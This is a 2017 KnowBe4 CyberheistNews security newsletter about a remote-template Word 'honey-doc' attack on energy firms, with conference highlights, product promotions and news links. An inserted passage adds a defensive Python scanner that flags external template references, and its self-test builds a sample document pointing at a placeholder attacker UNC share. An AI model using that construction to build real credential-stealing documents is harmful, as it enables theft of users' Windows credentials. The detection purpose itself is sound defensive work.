CyberheistNews Vol 7 #30
Scary New Social Engineering Attack Turns Off Your Power
OK, better get thinking about generators and 1,000 gallon drums of fuel to keep your data center up & running (which you should have done anyway for your disaster recovery plans...)
A new attack vector that bypasses all your software defenses has been discovered by Israeli cybersecurity company Cyberint. At the moment the bad guys are targeting US and UK energy companies which could cause power cuts and even cost lives, but this tactic could be used against anyone.
Here is how it plays out. A "honey-doc" masquerades as a resume attached to a harmless email. Both email and attachment are totally clean and contain no malicious code whatsoever. That's what makes them undetectable to any kind of incoming email filter.
However, the Word doc *is* weaponized with a template reference that, when the document is loaded, connects to the attacker’s server via Server Message Block and downloads a Word template which has an extremely well-hidden malicious payload.
The connection to the SMB server also provides the attacker with the victim’s credentials, which can then be used to acquire sensitive information and/or infiltrate the network and/or control systems used by the targeted employee.
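As an added, defender-side example that is not part of the newsletter or of Cyberint's research: a small Python scanner that opens a .docx as the zip archive it is and reports any attached-template relationship whose target is external (a UNC/SMB path or a URL), which is exactly the kind of reference the honey-doc relies on to make Word reach out and leak credentials. The minimal sample document and the placeholder host name are constructed for this example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# OOXML relationship namespace and the relationship type Word uses for the
# "attached template" reference recorded in word/settings.xml.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/"
                     "2006/relationships/attachedTemplate")
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"


def classify_target(target):
    """Classify where a template target would make Word reach out to."""
    t = target.strip()
    if re.match(r"(?i)^https?://", t):
        return "http"
    body = re.sub(r"(?i)^file:", "", t)
    # \\host\share\... or file://host/share/...: an SMB/UNC fetch, which also
    # hands the user's Windows credentials to that host during authentication.
    if body.startswith("\\\\") or re.match(r"^/{2,}(?![A-Za-z]:)[^/\\]+[/\\]", body):
        return "unc"
    if re.match(r"^/*[A-Za-z]:[\\/]", body):
        return "local"
    return "other"


def find_external_templates(docx_bytes):
    """Return (rels part, target, class) for every external attachedTemplate
    relationship in a .docx/.dotx held in memory as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                findings.append((name, target, classify_target(target)))
    return findings


def is_suspicious(docx_bytes):
    """True when opening the file would make Word fetch a template over the network."""
    return any(kind in ("unc", "http")
               for _, _, kind in find_external_templates(docx_bytes))


def build_sample_docx(template_target=None):
    """Build a minimal .docx in memory (constructed sample, not a real file).
    With template_target set it carries an attached-template reference the
    way a remote-template honey-doc does."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="%s"><w:body/></w:document>' % W_NS)
        settings = '<w:settings xmlns:w="%s" xmlns:r="%s">%s</w:settings>' % (
            W_NS, R_NS,
            '<w:attachedTemplate r:id="rId1"/>' if template_target else "")
        z.writestr("word/settings.xml", settings)
        if template_target:
            rels = ('<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                    'Target="%s" TargetMode="External"/></Relationships>'
                    % (REL_NS, ATTACHED_TEMPLATE,
                       escape(template_target, {'"': "&quot;"})))
            z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder host name: not an indicator from the campaign.
    sample = build_sample_docx(r"\\attacker-host.example\share\resume.dotm")
    for part, target, kind in find_external_templates(sample):
        print("%s -> %s [%s]" % (part, target, kind))
    print("suspicious:", is_suspicious(sample))
```

Run it over attachments at the mail gateway or in a sandbox; a clean resume has no external template relationship at all, so any "unc" or "http" hit is worth quarantining before a user opens it.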
The campaign appears to have started in May, and as it is targeted at infrastructure control systems of US and UK energy companies, it's not too hard to guess who is behind it.
The problem is that once this type of attack is out there in the wild (remember Stuxnet?) all kinds of bad guys get their hands on it. To protect against this type of attack, you want to step your employees through new-school security awareness training so that they do not fall for social engineering tactics like this.
Start with a no-charge Phishing Security Test and find out what percentage of your users will click an email that seems to come from IT@yourdomain.com. Start here:
https://info.knowbe4.com/phishing-security-test-chn
I Was at Black Hat / Def Con This Week. Wow. [VIDEO]
If you could not make it, it was fun, but a zoo, and Def Con was crowded with a rumored 30,000 attendees. It certainly felt like it! Here are some highlights, and more to come when I get back in the office:
- The Black Hat Keynote:
https://youtu.be/EC4EC5fcPL0
- I was interviewed by Dark Reading about social engineering. Scroll to 2:25:00:
https://youtu.be/pSlgo3kNNsQ
- Black Hat USA 2017 Attendee Survey Results. They released their third annual research report entitled, "Portrait of an Imminent Cyber Threat." The report is based on survey responses from nearly 600 Black Hat USA attendees. This year’s research explores issues on a national scale and raises concerns about potential threats to the U.S’s critical infrastructure, tools available for nation state attacks, WikiLeaks and more. You can download your copy here:
https://www.blackhat.com/docs/us-17/2017-Black-Hat-Attendee-Survey.pdf
- Black Hat presentation: Clever New Tool Shuts Down Ransomware Before It's Too Late:
https://www.wired.com/story/shieldfs-ransomware-protection-tool/
- Black Hat presentation: Active Directory Botnet sets up C&C infrastructure inside infected networks, while bypassing defenses. Techniques exploiting legitimate capabilities & controls. Scary!:
https://www.scmagazine.com/active-directory-botnet-sets-up-cc-infrastructure-inside-infected-networks-while-bypassing-defenses/article/677864/
- The winners of the PWNIE awards were announced and CSO wrote about them:
http://www.csoonline.com/article/3211592/security/winners-of-the-2017-pwnie-awards.html
Don’t Miss The August Live Demo: New-School Security Awareness Training
Today, your employees are frequently exposed to sophisticated phishing and ransomware attacks. Old-school security awareness training doesn’t hack it anymore. More than ever, your users are the weak link in your network security.
Join us on Wednesday, August 9, 2017, at 2:00 p.m. (EDT) for a 30-minute live product demonstration of KnowBe4’s Security Awareness Training and Simulated Phishing Platform to see the latest features and how easy it is to train and phish your users:
- NEW, Customized Automated Security Awareness Program creates a fully mature training program in just a few minutes!
- Social Engineering Indicators patent-pending technology, turns every simulated phishing email into a tool IT can use to instantly train employees.
- Access to the world's largest library of awareness training content through our innovative Module Store.
- Send Simulated Phishing tests to your users during specified business hours with "Reply-To Tracking" that shows you which users fall for spoofed emails and what they answer to the bad guys.
- Reporting to watch your Phish-prone percentage drop, with great ROI.
Register Now: https://register.gotowebinar.com/register/5545902949806655747
Surprising Moves in Cybersecurity 500 List for Q2
Cybersecurity Ventures has released its Cybersecurity 500 List for Q2 2017. The firm continuously evaluates new companies for inclusion in the Cybersecurity 500 by soliciting feedback from CISOs, IT security practitioners and service providers, and by researching hundreds of cybersecurity events and news sources.
root9B and Herjavec Group remained number one and two, respectively, from the Q1 cybersecurity listing, but after that, there was a lot of movement in the top 10. Raytheon, for instance, moved into the number three position thanks to a historic cybersecurity deal valued at nearly $1 billion over five years with the U.S. Department of Homeland Security. IBM and Cisco both returned to the top 10 after hovering just outside that plateau in February. And KnowBe4 made a huge jump from number 38 in Q1 to number six in Q2.
How do companies make significant moves, both up and down, in only a few months?
“We look at companies in a few different contexts,” explained Steve Morgan, founder and editor-in-chief at the Cybersecurity 500. “We are always evaluating revenue growth and market execution. But then we are also looking at what are the biggest challenges and which companies are doing what to help solve them.”
Take IBM as an example. “It may not be that obvious,” Morgan said, “but they are throwing a lot of weight behind supporting cybersecurity education at the high school level - which ties directly to the workforce shortage our industry is grappling with.”
Morgan emphasized the importance of security awareness training. Spending for security education is expected to reach $10 billion by 2027. “Security awareness has evolved from training employees to a discipline that is just as complicated and important as any other in our field,” he stated, and this played a role in KnowBe4’s jump in the rankings.
KnowBe4's move up the list was very surprising, Morgan admitted. “While the security awareness market is growing very quickly, it is an established space with dozens of companies who have been in it for years and quite a few new market entrants,” he added. “KnowBe4 keep doubling revenues and getting as big as they are - I couldn't have expected that they'd grow so much again over the past year. But, given they are in one of the biggest growth markets and have such a visible officer (Kevin Mitnick, Chief Hacking Officer), it makes sense.” More:
http://www.itbusinessedge.com/articles/surprising-moves-in-cybersecurity-500-list-for-q2.html
Let's stay safe out there.
Warm Regards,
Stu Sjouwerman
Founder and CEO
KnowBe4, Inc.
Quotes of the Week
"If you don't want anyone to know, don't do it." - Chinese Proverb
"Risk comes from not knowing what you're doing." - Warren Buffett
Thanks for reading CyberheistNews
Security News
The Lazy Habits of Phishing Attackers
Ransomware as a service (RaaS) has been around for a while. But it has typically been found on the dark web. In recent months, its creators have grown more brazen about promoting it on the open web, and that has the potential to change everything. Few RaaS kits exemplify this the way Philadelphia does.
At Black Hat 2017, Sophos released an in-depth report on the subject, Ransomware as a Service (RaaS): Deconstructing Philadelphia, written by Dorka Palotay, a threat researcher based in SophosLabs’ Budapest, Hungary, office. It delves into the inner mechanics of a ransomware kit anyone can buy for $400. Once purchased, the bad guys can use it to hijack computer data and hold it for ransom. More:
https://nakedsecurity.sophos.com/2017/07/25/ransomware-as-a-service-how-the-bad-guys-marketed-philadelphia/
This Is What Happens When You Reply to Spam Email. FUN
Suspicious emails: unclaimed insurance bonds, diamond-encrusted safe deposit boxes, close friends marooned in a foreign country. They pop up in our inboxes, and standard procedure is to delete on sight. But what happens when you reply? Follow along as writer and comedian James Veitch narrates a hilarious, weeks-long exchange with a spammer who offered to cut him in on a hot deal. FUN! But do not try this at home...
https://www.ted.com/talks/james_veitch_this_is_what_happens_when_you_reply_to_spam_email
Top 10 Twitter Accounts to Track the Latest Phishing Scams
TechInsurance wrote: "Once we get hip to one phishing scam, a new one pops up. As a busy IT consultant, you can't spend all day researching the latest phishing attacks. Fortunately, there is an easy way to keep track of the new phishing scams tormenting your clients – Twitter!
We combed through Twitter to find some of the most reputable – and frequent – tweeters who regularly post about phishing scams and other cyber security issues. If you follow these 10 Twitter accounts, you should be among the first to know about the latest cyber threats." I was their No. 1. Pretty nice.
http://www.techinsurance.com/blog/cyber-risk/top-10-twitter-accounts-to-track-the-latest-phishing-scams/
NIST Cybersecurity Framework (CSF) Sprint 2017 Workshop Findings
Chris Hoover at RSA wrote: "To shape their Cybersecurity Framework (CSF), NIST convenes a series of workshops open to any industry practitioners, vendors, or academics who wish to attend.
I recently returned from the 2017 NIST CSF Workshop at their headquarters in Gaithersburg, MD. For those interested in the NIST CSF but unable to attend, I will quickly run through the highlights. The exciting thing about these workshops that makes them different from any other framework or guidance is that the feedback from the audience gets translated in very high fidelity into the next version of the CSF.
In addition to a recent round of public review, feedback from the 2017 workshop will be incorporated into CSF version 1.1 later this year. Keeping this in mind, the feedback captured below is a sneak-peek into what the finalized NIST CSF 1.1 might look like.
The bullets are a mixture of comments and recommendations from the conference attendees for each topic. These comments are very high level, but you can access recordings of many of the sessions here. If I were a betting person, I would expect to see most of these items incorporated into the NIST CSF roadmap and for many to be in the final version of NIST CSF 1.1." Here is the article:
https://blogs.rsa.com/nist-csf-spring-2017-workshop-findings/
I like this because the NIST CSF Framework is getting so much attention. Not only is it backed by a Presidential Order, but it is also going to become more precise. We make it easy to build and document these NIST controls (and any others) using the KnowBe4 Compliance Manager (KCM). Your audit shows your compliance in half the time and at half the cost. Get a demo of KCM and see for yourself:
https://www.knowbe4.com/products/compliance-manager-software
Get Your Customized Automated Security Awareness Program, ASAP!
Many IT pros don’t exactly know where to start when it comes to creating a security awareness program that will work for their organization.
We’ve taken away all the guesswork with our Free Automated Security Awareness Program builder (ASAP). ASAP is a revolutionary new tool for IT professionals, which builds a customized Security Awareness Program for your organization that will show you the steps needed to create a fully mature training program in just a few minutes!
The program is complete with actionable tasks, helpful tips, courseware suggestions and a management calendar. You also have the ability to export the full program as a detailed or executive summary version in PDF format. This is great ammo to help you get budget and reporting to management.
Here's how it works:
- 15-25 questions depending upon answers
- Suggested training materials based on answers
- Calendar and list view of tasks
- Detailed and summary exportable PDF versions of your program
- Fully mature awareness program ready in 10 minutes
https://info.knowbe4.com/asap-chn
PS: If you’re a current KnowBe4 customer, just log in to your console, click on ASAP at the top right and get started!
Interesting News Items This Week
Nuance the Latest NotPetya Victim to Report Financial Impact:
http://www.bankinfosecurity.com/nuance-latest-notpetya-victim-to-report-financial-impact-a-10138
More Than 500,000 Systems Infected by Stantinko Malware Since 2012:
https://securityintelligence.com/news/more-than-500000-systems-infected-by-stantinko-malware-since-2012/
UniCredit breach: Data of 400,000 customers exposed. Another compromise example, but what I thought was interesting is how much they are going to spend to mitigate the risks. Huge!:
https://www.helpnetsecurity.com/2017/07/26/unicredit-breach/
Iranian Espionage Campaign Hinges on Beautiful (But Fake) Woman. Good description of the lengths the bad guys go through to social engineer someone and compromise them with a honeytrap:
https://www.infosecurity-magazine.com/news/iranian-espionage-campaign-fake/
Phishers’ techniques and behaviors, and what to do if you’ve been phished. Once a user has been phished, how long does it take for the phishers to misuse the stolen credentials?:
https://www.helpnetsecurity.com/2017/07/28/phishers-tactics-and-behaviours/
Nine HIPAA settlements so far this year. Holy Moly, these are expensive:
http://medcitynews.com/2017/07/hipaa-settlements-so-far-this-year/
Cyberheist 'Fave' Links
This Week's Links We Like, Tips, Hints and Fun Stuff
- Best Of The Year So Far: The most awesome jumps, ski, snowboard, bicycling, gymnastics, martial arts, paragliding, basketball, ping pong, tennis and wingsuit flying in 2017:
http://www.flixxy.com/people-are-awesome-best-of-the-year-2017-so-far.htm?utm_source=4
- Stunningly beautiful sequences filmed from the cockpit show what life is really like for pilots at 35,000 feet:
http://www.flixxy.com/a-stunningly-beautiful-view-from-the-cockpit.htm?utm_source=4
- The 'Real Life Sherlock Holmes' is back and continues to blow the minds of the judges and audience at America's Got Talent 2017:
http://www.flixxy.com/mind-reader-colin-cloud-amazes-americas-got-talent-2017.htm?utm_source=4
- How they pulled off the Atomic Blonde's killer action scene:
https://www.wired.com/story/atomic-blonde-killer-action-sequence?
- Why is the Mona Lisa so famous? You will probably be surprised:
http://www.flixxy.com/why-is-the-mona-lisa-so-famous.htm?utm_source=4
- Some of the World's best teeterboard performers defy gravity in Rome, Italy:
http://www.flixxy.com/worlds-best-teeterboard.htm?utm_source=4
- For the kids: Animals of all shapes and sizes love hugging as much as humans do ... maybe even more:
http://www.flixxy.com/animals-also-like-to-cuddle.htm?utm_source=4